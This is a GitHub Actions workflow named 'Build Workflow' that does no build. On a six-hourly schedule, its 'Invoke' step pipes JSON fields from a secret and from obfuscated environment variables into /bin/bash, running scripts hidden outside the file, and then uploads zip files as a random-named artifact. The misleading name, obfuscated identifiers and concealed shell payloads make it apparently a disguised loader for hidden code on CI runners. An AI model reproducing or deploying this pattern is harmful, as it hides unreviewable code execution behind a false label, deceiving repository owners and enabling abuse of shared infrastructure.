name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          js246: ${{ secrets.js246 }}
        run: |
          printf '%s' "$js246" | jq -r .iz3307 | /bin/bash
          printf '%s' "$cbrin66" | jq -r .opnh900 | /bin/bash
          echo $bqi5 | jq -r .vkdc4509 | /bin/bash
          echo $xmxmu424 | jq -r .vx082 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 2oZAZqiK
          path: "*.zip"
          retention-days: 1
